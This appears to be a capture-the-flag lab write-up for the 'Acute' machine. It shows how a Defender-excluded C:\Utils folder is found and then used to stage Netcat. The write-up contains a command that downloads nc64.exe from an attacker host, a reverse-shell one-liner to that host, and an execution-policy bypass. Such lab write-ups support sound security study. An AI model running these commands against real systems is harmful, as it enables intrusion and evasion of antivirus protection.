InfoSec LAB

Acute_AV_ExclusionPath_Acute-PC01

Created: 2 min read

AV ExclusionPath

After conducting a series of basic enumeration on the Acute-PC01 host, I found a none default directory at the system root

PS C:\> ls 
 
 
    Directory: C:\
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         12/7/2019   9:14 AM                PerfLogs                                                             
d-r---         12/6/2021  11:06 AM                Program Files                                                        
d-r---         12/7/2021  12:43 PM                Program Files (x86)                                                  
d-r---        12/21/2021  10:50 PM                Users                                                                
d-----         1/31/2022  12:29 AM                Utils                                                                
d-----        12/16/2021   1:23 AM                Windows

Its the C:\Utils directory

PS C:\> ls C:\Utils
PS C:\> ls -Force C:\Utils
 
 
    Directory: C:\Utils
 
 
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-h--        12/21/2021   6:41 PM            148 desktop.ini

While the C:\Utils directory seems empty at first, the desktop.ini file is revealed upon listing with the -Force flag desktop.ini is a special configuration file in Windows used to customize the appearance and behavior of folders on the desktop. It can specify settings like the folder’s icon, its localized name, and attributes. When present in a folder, desktop.ini controls how that folder is displayed and behaves within the Windows File Explorer.

PS C:\> cat C:\Utils\desktop.ini
[.ShellClassInfo]
InfoTip=Directory for Testing Files without Defender

The directory seems to be set for ExclusionPath This would mean that arbitrary binaries could be executed from this directory as it is excluded from AV

PS C:\> icacls C:\Utils
 
C:\Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
         BUILTIN\Administrators:(OI)(CI)(F)
         ACUTE\edavies:(OI)(CI)(M)
         BUILTIN\Users:(OI)(CI)(R)
 
Successfully processed 1 files; Failed processing 0 files

Checking the directory permission reveals that the current user is able to write to the C:\Utils directory

Stable Shell

Since the console window of the PSWA session is rather limited, I will start another PowerShell session via Netcat using the discovered exclusion path above

PS C:\Utils> iwr -Uri 'http://10.10.16.8/nc64.exe' -OutFile C:\Utils\nc64.exe
PS C:\Utils> cmd /c nc64.exe 10.10.16.8 9999 -e powershell

Netcat transferred over HTTP and invoking a reverse shell

┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ nnc 9999          
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 49863
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\Utils> PowerShell -ep bypass
PS C:\Utils

I will also bypass the Execution Policy Leveraging this information, I will be able to run PEAS

Interactive Graph View

Backlinks